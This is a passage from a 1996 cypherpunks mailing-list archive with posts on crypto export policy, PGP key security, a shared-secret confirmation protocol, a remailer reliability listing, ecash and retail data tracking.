> to imply is that the book is being advertised widely (I've seen half a
> dozen announcements of it), 

Ah .. I misunderstood, the ad is being spammed.  We have a truly awful
news feed which gets around 2 weeks of lag, at time of posting that
was the only one I'd seen.

> >The writing style wasn't great, and I'd agree there were plenty of
> >flaws, but what I was interested in was cypherpunks opinions on the
> >technology, rather than the quality of the book, or making money for
> 
> The main technology, "the truth machine," is so bogus as to be boring.

um, ok.  The presentation of it in the book was sketchy, and many of
his conclusions I felt shaky, but here's a few entries I think
plausible for lie detectors:

- travelling by car in the US a few years ago at a border check point
between two US states the border gaurds asked if anyone in the car was
not US, they made a point of looking you in the eye while questioning
you.  In conversation later it was suggested that they are trained to
observe and notice people who look nervous for some reason.  Seems
that if a technology was available to improve the reliability of quick
spot check questions they wouldn't have any compunction using it.

- drink driving breath tests (a real lie detector) to check if you
have been drinking.  No longer content with asking if you've been
drinking they ask, and then breathalize you.  In the UK it is an
offence to refuse a breath test if stopped whilst driving.

- some automation for `anything to declare?' questions at customs, a
lie detector, say put your hand on here, then `anything to declare?'

Just trying to think up some plausible examples of where it might one
day be legally required to take a lie detector test in the course of
your normal business.

> >- cheap video used by everyone to record their own lives
> 
> A better treatment of this is in David Brin's "Earth."

ta, will take a look.

> However, what you say below about being required to explain your movements
> to cops who stop you on the highway and then present "papers" to them

lest that was misleading: the documents required for presentation at
police station are insurance certificate, and MOT document
(roadworthiness certificate (another infringement of liberty in my
view, you are legally required to keep your vehicles in A1 condition,
and the strictness of the tests keeps creeping up)).  Explaining your
movements as I say I'm unsure of the legal position, but they ask you
anyway.

> !!!
> 
> Glad I don't live in Britain.

Well, we don't have curfews yet, but they're getting keen on security
video cameras lately, the university has a few even, on top of
buildings, the steerable variety, and with what I presume are IR spots
mounted on them.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 3 Jun 1996 13:12:37 +0800
To: cypherpunks@toad.com
Subject: NRC Session Hiss
Message-ID: <199606030150.BAA27932@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   During the Q&A of the NRC public session, it was asked why 
   56-bit DES was selected as the standard of export over 
   other widely distributed programs such as PGP. 
 
   The panelists seemed to me uneasy in answering this. 
   Primarily their view was that DES was "ubquitious," well- 
   known and tested by use. 
 
   However, when pressed by later questioners on this topic, 
   they expanded their view: that if another, stronger, 
   program became "ubiquitous" -- in wide use -- they would 
   support it as the standard of export. When it was pointed 
   out that PGP now fit this definition, the panel merely 
   repeated the statement about ubiquity without specifically 
   affirming or denying the PGP claim. Their poker faces 
   seemed uniformly in place to dampen a potential 
   inflammatory topic. 
 
   Perhaps other attendees will amplify this odd demeanor, but 
   it seems to me that the panel was attempting to avoid 
   commenting one way or the other on PGP's worldwide ubiquity 
   for unstated reasons. 
 
   I wonder if this was a nudge to the audience that the 
   informal spread of unapproved encryption is the best way to 
   establish its ubiquity and thereby to set a new standard 
   for export, sort of under the noses of the authorities -- 
   as if PGP was exemplary. 
 
   Recall that this fits the Clinton administration's way of 
   getting around the Croatian arms embargo -- the "no 
   position" position of sidestepping legality. 
 
   Also, I wonder if the panel wants avoid an open conflict 
   with the administration, the LEAs and the security agencies 
   about PGP. (Or do they know something about PGP that we 
   don't know, or have been led to think they do?) 
 
   Peter Neumann had pointed out earlier that crypto was going 
   to be ubiquitous, and fairly soon, no matter what. He noted 
   that it is the NRC's recommendation that LEAs take the 
   "long-term, pro-active" view about this and get on with 
   developing other technologies, and training personnel in 
   them, to fight computer crime -- like traffic analysis, 
   packet trace, etc. -- and to accept that prohibiting and 
   cracking crypto is not effective. (This may have been 
   diversionary, but he seemed sincere.) 
 
   Perhaps the panel is agreeing the crypto genie is out of 
   the bottle, and are advising the authorities to recognize 
   that stronger and stronger crypto is going to become 
   ubiquitous, and it's time to move on to other, presumably 
   less ubiquitious, cyber-crime fighting technolgies. 
 
   Perhaps the committee was briefed on these technolgies, or 
   maybe some members are even developing them -- Mr. Neumann, 
   for example, in conjunction with Ms. Denning, et al. 
 
   Those who plan to attend the June 6 session might want to 
   pursue the "no position" position about PGP's ubiquity, and 
   why. Diversionary sop, say, to cover the promotion of non- 
   crypto invasion of privacy. 
 
   Further, it would be helpful to learn more about what the 
   the committee members were told about "long-term" cyber- 
   surveillance technologies in the pipeline. 
 
   What bothered me more than anything else about the session 
   was that individual privacy got such short shrift by 
   panelists and by the audience.  While there was a bit of 
   discussion on personal privacy protection, government and 
   business, and their mutual back-scratching, seemed to the 
   the primary focus. 
 
   Pretty Lousy Privacy appears to be in the works, judging 
   from what was not disclosed in the session (and in the 
   report) about two 800-pounders working in concert at 
   citizen data gathering, mining, selling, controlling, 
   dominating -- at the expense of individual privacy, and, 
   shout it, liberty. 
 
   Peter Neumann got to me when he described the "downside" of 
   anonymity, encryption and security: how can we know who are 
   the criminals if we don't for sure who is who and know for 
   sure who is doing what? Not a single panelist disagreed 
   with his statement about this, but then I heard only a few 
   snorts from the criminal-fraught-fed audience. 
 
   I kept mum. Jesus, who knows who was recording every 
   titter and hiss -- besides anonymous beside me and me. 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 3 Jun 1996 21:09:04 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java Crypto API questions
In-Reply-To: <Pine.SUN.3.91.960531114414.23205A-100000@rwd.goucher.edu>
Message-ID: <31B2ADA5.577D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern wrote:
> 
> Moltar Ramone writes:
> >  Probably.  But they won't be able to export the signed 3DES
> >  package :) It leaves foreign vendors in trouble, is where.
> 
> Sun can export the signature though.  The vendor already has the package,
> they just need the sig/cert...

  Not likely.  Sun will probably be required to agree not to do this
as a condition of exporting software with "pluggable crypto".  Software
with hooks for crypto functions is treated the same as the actual crypto
as far as the ITAR is concerned.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 3 Jun 1996 19:23:04 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Security of PGP if Secret Key Available?
Message-ID: <Pine.ULT.3.91.960603023229.6519B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

About once a week we get some lame-o flame bait posted to 
alt.security.pgp or this mailing list or somewhere abotu some hole in 
PGP.  We further say with fairly good reliability that they are bogus, 
get a light chuckle, and then go back to dealing with the real issues.

However, I got to wondering about the security of PGP assuming somebody 
trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have 
it on my personal computer, and somebody gets my secret key, how much 
less robust has PGP just become, and what are appropriate and reasonable 
steps to take to protect this weakness?

Thanks


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMbJ5xTokqlyVGmCFAQGcAgQAvjFdZ+YLdQGxDHcT+GOwP82BSwiTYlaQ
F9RV8L+radCK/SyeLnEtoodkKVqpcsItIQ/JJ44FOAmnsBLljuWqbhZMl8G8+uCB
pcpkXpre83CwoM6qDKkCEyqCiMxq857ioCoqb+WRNJYbb++muVBDHADVzGoGOjLg
cvIMxnnXF3c=
=tnTb
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GED/J d-- s:++>: a- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 3 Jun 1996 17:48:57 +0800
To: cypherpunks@toad.com
Subject: The Elevator Problem
Message-ID: <199606030719.DAA26321@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



This may be old hat, but an earlier post (around the time the Kocher 
RSA-timing attack came out) to the list asked about the "Elevator 
Problem", where two parties who think they share the same secret want 
to confirm it on an open channel.  I came up with an idea for a 
protocol but never got around to posting it, and dropped off the list 
briefly... so pardon me if this is already touched upon.

Alice and Bob are in a crowded place and want to confirm they share a 
secret.

Each picks a couple of random numbers, b and i.  The secret P is 
hashed i times, something like:

  H_0(P) = H(P,0)               [H can be something like SHA-1...]
  H_i(P) = H(H_i-1(P), i)

They then tell each other bit b of H_i(P).

This is repeated a number of times to make random guessing very 
unlikely.

If all bits match, they agree that they share the secret (we assume 
neither wants to lie but discover if the other knows the secret).

Since this is a mutual protocol, an eavesdropper who listens in 
shouldn't be able to spoof Alice or Bob.  Or maybe Alice and Bob can 
agree never to reuse combinations of b and i anyway (or they can 
append a counter to the secret, so that combinations of b and i never 
give the same values).

Could be useful for implementing as a remote login?


Comments?



Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 3 Jun 1996 20:18:46 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Why PGP isn't so ubiquitous (was NRC Session Hiss)
Message-ID: <199606030902.FAA27168@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Jun 96 at 21:15, Lucky Green wrote:

> That PGP is ubiquitous is subject to discussion. PGP is widely available, 
> but that doesn't mean that it is widely used. What percentage of email is 
> PGP encrypted? Less than half a percent?

In part because it's not well integrated with mailers.  That could 
change with a PGP3 DLL.

PGP isn't only used for email:

 o files distributed over the net that are PGP-signed
 o signed email
 o non-emailed file distributions (over BBS, or physical
    transfer of disks)
 o personal storage (though other utilities are better-suited
    for that than PGP)
 o related utilities that make use of PGP-keys (HPack
    archiver)

The reasons PGP hasn't become widely used are because of it's lack of 
user-friendliness and poor integration into other tools, irregardless 
of S/MIME.

Rob.

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Mon, 3 Jun 1996 15:11:21 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <199606022242.RAA19983@manifold.algebra.com>
Message-ID: <31b270f2.123131630@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 2 Jun 1996 17:42:49 -0500 (CDT), you wrote:

>What would happen with all ecash that's been issued? Of course
>criminals would be able to forge large amounts of authentic-looking
>ecash, so banks should not be honoring requests to convert e-cash into
>real cash.

	As I understand it, ecash shouldn't be withdrawn until shortly before it
is spent.  If the RSA algorithm is broken, then then banks could refuse the
withdrawal (and depositing) of money as ecash.  The remainder of the money in
each users' account would have to be withdrawn through conventional methods.

	Of course all the outstanding (between withdrawl and deposit) ecash
could be a problem.
"Randomness is in the eye of the beholder" --Numerical Recipes
gregmi@mis.net (Greg Miller)
http://grendel.ius.indiana.edu/~gmiller/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 4 Jun 1996 03:19:47 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199606031350.GAA01754@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 3 Jun 96 6:47:19 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              ********+***     6:17  99.89%
vegas    remailer@vegas.gateway.com       ** * *--****    37:04  99.82%
amnesia  amnesia@chardos.connix.com       ------------  3:52:31  99.74%
flame    remailer@flame.alias.net         -----++---++  1:25:32  99.74%
exon     remailer@remailer.nl.com         +***#- * *+*     5:48  99.33%
ecafe    cpunk@remail.ecafe.org           ####+**##*#*     1:17  99.31%
alpha    alias@alpha.c2.org               *+ +++-++**+    45:57  99.26%
c2       remail@c2.org                    +- ++.-+++++    57:37  99.24%
haystack haystack@holy.cow.net            +*-***#+# ##    10:00  98.62%
penet    anon@anon.penet.fi               _-. .___ --  40:43:38  97.37%
extropia remail@miron.vip.best.com        -----------   9:35:17  97.17%
alumni   hal@alumni.caltech.edu           *#-+##* -##     15:58  95.46%
mix      mixmaster@remail.obscura.com     .--++--+++-   2:29:31  94.30%
portal   hfinney@shell.portal.com         *#-+##*# ##     17:14  93.19%
lead     mix@zifi.genetics.utah.edu       +++++++++++     36:51  92.05%
treehole remailer@mockingbird.alias.net    - .--.-.-    8:47:35  90.83%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Mon, 3 Jun 1996 23:42:32 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <m0uQXfA-00037hC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:50 AM 6/3/96 +0000, Deranged Mutant wrote:
>
>This may be old hat, but an earlier post (around the time the Kocher 
>RSA-timing attack came out) to the list asked about the "Elevator 
>Problem", where two parties who think they share the same secret want 
>to confirm it on an open channel.  I came up with an idea for a 
>protocol but never got around to posting it, and dropped off the list 
>briefly... so pardon me if this is already touched upon.
>
>Alice and Bob are in a crowded place and want to confirm they share a 
>secret.
>
>Each picks a couple of random numbers, b and i.  The secret P is 
>hashed i times, something like:
>
>  H_0(P) = H(P,0)               [H can be something like SHA-1...]
>  H_i(P) = H(H_i-1(P), i)
>
>They then tell each other bit b of H_i(P).
>
>This is repeated a number of times to make random guessing very 
>unlikely.
>
>If all bits match, they agree that they share the secret (we assume 
>neither wants to lie but discover if the other knows the secret).
>
>Since this is a mutual protocol, an eavesdropper who listens in 
>shouldn't be able to spoof Alice or Bob.  Or maybe Alice and Bob can 
>agree never to reuse combinations of b and i anyway (or they can 
>append a counter to the secret, so that combinations of b and i never 
>give the same values).
>
>Could be useful for implementing as a remote login?
>
>
>Comments?
>
>
>
>Rob.
>
>---
>No-frills sig.
>Befriend my mail filter by sending a message with the subject "send help"
>Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
>        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
>Send a message with the subject "send pgp-key" for a copy of my key.
>
>
Its a good thought, I never even thought about it, but it should work.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69
<jwilk@iglou.com>         Record- 2-4-4
Age- 13                   Final Standings- 2nd Place (Beat in Championship)
President & Founder:                   
Revolution Software       "I have the fastest glove in the east!"
Profanity Software        "Hackers never stop hacking they just get caught"
VSoft

My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
til' 5:00p, hack til' 7:00a
Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) The Unabrower |:-)

Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: remailer@2005.bart.nl (Senator Exon)
Date: Mon, 3 Jun 1996 16:16:17 +0800
To: cypherpunks@toad.com
Subject: Re: Something that just crossed my mind. Sorry.
Message-ID: <199606030519.HAA08335@spoof.bart.nl>
MIME-Version: 1.0
Content-Type: text/plain



At 10:01 AM 5/31/96 -0700, Sandy wrote:
>At 10:35 PM 5/30/96 -0500, snow wrote:
>
>>It is my position (until proven wrong--please) that larger business DON'T
>>want anonymity. They _want_ to be able to track purchases and use of their
>>product for several reasons. 

Let me first claim that I am an employee of a "larger business."  Not that unless someone tracks me through the remailers is there any proof of that, but accept for now that it's not outside of the realm of possibility.

I wish I could prove you wrong.  I can inform you that you are correct, actually.  There are large retail companies that track sales data on credit card account numbers and cardholder names in direct violation of any contract you may have with American Express (and possibly Visa and others, I have not seen those contracts).  The data they capture is pretty impressive.  I'm sure most of you probably get a direct mailing or two from them every now and then, based on your shopping habits.

>Two quick answers:
>
>1)      What big business wants and what it would be
>        willing to accept in order to make sales, are
>        two different things.  While demographic data
>        are nice, an more robust economy full of big
>        spenders is better.

And demographic data on big spenders is worth more than anonymous cash from people who buy packages of gum.  Much more.

The best part of the equation is that the big spenders are giving up the demographic information for free, every time they hand over a credit card.  You even filter out the gum-buyers because gum-buyers use cash, which you don't track.

An economy of big spenders is worthless unless they're in your store.  The cards give evidence of who spends in your store, so you target your advertisements accordingly.

>2)      Big businesses are made up of individuals.
>        Most individuals would still prefer to have 
>        their own privacy preserved even if they would 
>        prefer less privacy for others.  

All it takes is one well-positioned executive who values profits more than his own privacy to say "Capture this personal data" and that data gets captured, regardless of who gets fired complaining about it.  Trust me.  And I value my job more than I value your privacy, which is why this is going out through a remailer.

I also shop only with cash, here and elsewhere.  Double-blinded e-cash will be the only way to go, if it ever is the way to go.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 4 Jun 1996 01:48:35 +0800
To: perry@piermont.com
Subject: Re: Sun pushing SKIP for intranets and java
In-Reply-To: <199605272346.TAA08318@jekyll.piermont.com>
Message-ID: <31B2E2E3.5D1A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:

> If thats true, its a remarkably bad idea. The IP security layer isn't
> anywhere near the layer where you should be doing things like signing
> Java applets.

I think that the SKIP stuff would be intended to protect on-the-wire
marshalled objects when using the CORBA or RMI stuff to do inter-VM
method invocation.  The signature stuff is a whole 'nuther enchilada.

(I assume, Perry, that you weren't at the fabulous JavaOne thing last
week, because I didn't notice anyone spontaneously combusting from all
the hype :-)

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 4 Jun 1996 04:56:35 +0800
To: andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Java Crypto API questions
Message-ID: <199606031521.IAA12484@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:17 AM 6/3/96 -0700, Jeff Weinstein wrote:
>Andrew Loewenstern wrote:
>> 
>> Moltar Ramone writes:
>> >  Probably.  But they won't be able to export the signed 3DES
>> >  package :) It leaves foreign vendors in trouble, is where.
>> 
>> Sun can export the signature though.  The vendor already has the package,
>> they just need the sig/cert...
>
>  Not likely.  Sun will probably be required to agree not to do this
>as a condition of exporting software with "pluggable crypto".  Software
>with hooks for crypto functions is treated the same as the actual crypto
>as far as the ITAR is concerned.

But you haven't explained why somebody can't export JUST the signature.  You 
know, import the software, have Sun sign it domestically, strip off everything that isn't a 
signature, and export the signature.  Append it to the un-imported code 
outside the country.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Jessup <kevin.jessup@mail.mei.com>
Date: Tue, 4 Jun 1996 03:30:09 +0800
To: cypherpunks@toad.com
Subject: Re: Java Crypto API questions
Message-ID: <01I5GTVSACW299NQKT@meipws.mis.mei.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> wrote...

>  Not likely.  Sun will probably be required to agree not to do this
>as a condition of exporting software with "pluggable crypto".  Software
>with hooks for crypto functions is treated the same as the actual crypto
>as far as the ITAR is concerned.
>
>	--Jeff

Just WHAT is a "hook" for crypto??  ;-) I've read about the
Microsoft crypto API, other such hooks and the "ban on
hooks", but who says a "hook" must be so "generic".

With things such as the "component object model" stuff
Microsoft is pushing and similar technologies in the UNIX
world, I can still see "hooking" to crypto.  Though perhaps
more on an application-specific basis and not so "generically".

I acknowledge that crypto which is nearly "invisible" to the
end-user will make it more widespread, and thus the need
for a generic API.

Politicians and technology: like oil and water.

--                             "Rest enough for the individual man - [but] too 
Kevin Jessup                   much or too soon and we call it Death.  But for 
software engineer                  MAN, no rest and no ending.  He must go on, 
Marquette Medical Systems           conquest beyond conquest...and when he has 
http://www.mei.com               conquered all the depths of space and all the 
PGP Email preferred            mysteries of time, still he will be beginning." 
kevin.jessup@meipws.mis.mei.com               -- H.G. Wells, Things To Come  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 4 Jun 1996 06:50:03 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Fate of Ecash if RSA is cracked?
Message-ID: <add8d6a4070210044ee4@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 8:01 AM 6/3/96, Perry E. Metzger wrote:
>Dr. Dimitri Vulis writes:
....
>> This'll happen, probably sooner than later.
>
>Why do you assume that? There are plenty of problems that are
>provably not solvable in non-exponential time even if P=NP. What makes
>you think this one is going to be solved?
>
>.pm

The "Idea Futures" forum has established odds on this. The current odds are
currently 60% that a 1024 bit number will be factored by 2010 and 30% that
a 512 bit number will be factored by 1997.

See <http://if.arc.ab.ca/IF.shtml> for Idea Futures and
<http://if.arc.ab.ca/bin/summary> for odds for various questions.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph L. Moll" <jmoll@acquion.com>
Date: Tue, 4 Jun 1996 03:13:36 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
Message-ID: <2.2.32.19960603141003.006ebeb4@mail.acquion.com>
MIME-Version: 1.0
Content-Type: text/plain



I have seen monetary items represented as integers, with the software
assuming that the last two digits are actually the "cents" part of the
float.  There are still round off problems with this scheme, but the
calculations are much faster since they are integers.
---
Joseph L. (Joe) Moll -- Network and Communications Engineering
mailto:jmoll@acquion.com http://www.acquion.com  phone:864-281-4108
ACQUION, Inc.  Greenville, SC  USA -- Specialists in Electronic Commerce
disclaimer:  This email is not to be considered official correspondence
---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 4 Jun 1996 03:21:00 +0800
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Security of PGP if Secret Key Available?
In-Reply-To: <Pine.ULT.3.91.960603023229.6519B-100000@krypton.mankato.msus.edu>
Message-ID: <199606031411.KAA01253@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> However, I got to wondering about the security of PGP assuming somebody 
> trying to read my PGPed stuff has my 1024-bit secret key.  ie, if I have 
> it on my personal computer, and somebody gets my secret key, how much 
> less robust has PGP just become, and what are appropriate and reasonable 
> steps to take to protect this weakness?

The security of the PGP system is based around the security of the PGP
private (secret) key.  The security of the secret key is based on two
things: 1) The bits in the secring, and 2) the user pass phrase.  An
attacker needs both 1 and 2 to compromise a secret key.  Posession of
only one of them is not enough.  It doesn't matter how big your key
is.  It could be 384 bits, it could be 2048 bits.  You still have the
same two walls protecting your key.

If someone has read your secring file, that means they only have to
get your pass phrase.  This gives an attacker something to go for.
Once they obtain your pass phrase as well, your key is compromised.

If, however, they obtain your secret keyring but they CANNOT obtain
your pass phrase, you are still safe.  It just means you have one fewer
walls surrounding your secret key.

I always assume that someone has compromised my secret keyring, in
that someone has obtained a copy of it.  So I spend most of my "time"
(granted, it's not a lot) trying to protect my pass phrase.  I have a
fairly long pass phrase, more than 40 characters, and I make sure I
KNOW (not believe, KNOW) the path the bits take from the keyboard to
the CPU -- and I make sure that path is secure.  Otherwise I don't run
PGP at that time.

Since I have a laptop, that makes my life much easier -- I
cut-and-paste my PGP mail over to the laptop and run PGP there.
>From the laptop I can send mail out directly.

I hope this answers your question,

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 4 Jun 1996 07:32:53 +0800
To: cypherpunks@toad.com
Subject: DEMOGRAPHICS v. ANONYMITY
Message-ID: <2.2.32.19960603171454.00717340@popmail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                       SANDY SANDFORT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C'punks,

At 07:19 AM 6/3/96 +0200, "Senator Exon" wrote:

>... demographic data on big spenders is worth more than
>anonymous cash from people who buy packages of gum.  Much 
>more.

A true, but irrelevant.  The correct dichotomy is between
demographic data on big spenders and anonymous big spenders.
Yes, it would be nice to have demographics on everyone, but
demographics are secondary to sales.

>An economy of big spenders is worthless unless they're in 
>your store.  The cards give evidence of who spends in your 
